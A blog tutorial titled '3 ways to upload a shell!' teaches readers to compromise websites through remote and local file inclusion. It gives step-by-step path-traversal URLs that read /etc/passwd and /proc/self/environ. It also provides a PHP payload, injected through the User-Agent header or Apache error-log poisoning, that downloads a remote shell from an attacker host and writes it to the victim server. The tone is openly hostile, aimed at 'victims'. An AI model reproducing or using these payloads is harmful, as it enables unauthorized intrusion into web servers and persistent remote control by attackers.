skip to main |
skip to sidebar
3 ways to upload a shell!
Alright so I'm bored again and writing this nice tutorial for you guys.
NOTE: This tutorial is COMPLETELY written by me from my experience, therefore I won't give credit to anyone.
This tutorial contains:
-> RFI
-> LFI method 1
-> LFI method 2
First, I will start with the RFI method.
RFI or Remote File Inclusion is a technique which allows you to include a remote file(from a URL) to a webscript.
Let's say we have a website called
Code:
http://www.v1ct1mp4g31337.com/index.php?include=register.php
Now take a look at the part after "index.php?", do you see that "include=register.php" ? This is exactly what we are looking for.
Now try to include google by typing in
Code:
http://www.v1ct1mp4g31337.com/index.php?include=http%3A%2F%2Fwww.google.com
Now, if it displays the google page, you are able to include remote files. If it gives an error message, jump to the LFI part of the tutorial now.
Well, let's just say it worked and it displays google. Now we are going to include a shell(you can get one here). Do this by typing this into your URL bar:
Code:
http://www.v1ct1mp4g31337.com/index.php?include=http%3A%2F%2Fwww.z0mgh4x0rpage.com%2Fmastershell.txt
WARNING: Put your shell ALWAYS in TXT format on your website, otherwise people will be able to access it and F*** with your server!!
Alright thats it! Now your shell is included and you can rape the victims webserver.
Now we are going for LFI method 1
NOTE: You will need FireFox and its addon Tamper Data to do this method!
LFI or Local File Inclusion allows you to include a local file(which means, that the file is stored on the server) and run it in a webscript.
In this method we are going to upload a shell by accessing the proc/self/environ.
Now we have our page
Code:
http://www.v1ct1mp4g31337.com/index.php?include=register.php
And now we are going to do this:
Code:
http://www.v1ct1mp4g31337.com/index.php?include=..%2F
If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:
Code:
http://www.v1ct1mp4g31337.com/index.php?include=..%2Fetc%2Fpasswd
And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:
Code:
http://www.v1ct1mp4g31337.com/index.php?include=..%2Fetc%2Fpasswd
http://www.v1ct1mp4g31337.com/index.php?include=..%2F..%2Fetc%2Fpasswd
http://www.v1ct1mp4g31337.com/index.php?include=..%2F..%2F..%2Fetc%2Fpasswd
And so on. Now let's say we got to this URL
Code:
http://www.v1ct1mp4g31337.com/index.php?include=..%2F..%2F..%2Fetc%2Fpasswd
And we see some huge shitty text we can not handle with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:
Code:
http://www.v1ct1mp4g31337.com/index.php?include=..%2F..%2F..%2Fproc%2Fself%2Fenviron
If you see some text, you did good, if you see an error message you did bad. Now this is the point where we use Tamper Data. Start you Tamper and reload the page, and for user agent you type in the following PHP script:
PHP Code:
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/mastershell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.
Now simply access your shell by going to
Code:
http://www.v1ct1mp4g31337.com/shell.php
And rape the server.
Now LFI method 2
NOTE: This only works on apache servers!
Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/logs/error.log
If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).
Now when you have found the file, open up cmd and type in
Code:
telnet www.v1ct1mp4g31337.com 80
When you are inside the telnet, you copy the following code(you use your own shell url ofc)
PHP Code:
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/mastershell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
Paste it into the telnet window, and press enter once or maybe twice(until you get an error message).
Now refresh the page in the browser(error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:
Code:
http://www.v1ct1mp4g31337.com/shell.php
I hope I could help you and Thank you is always appreciated!
0 komentar:
Posting Komentar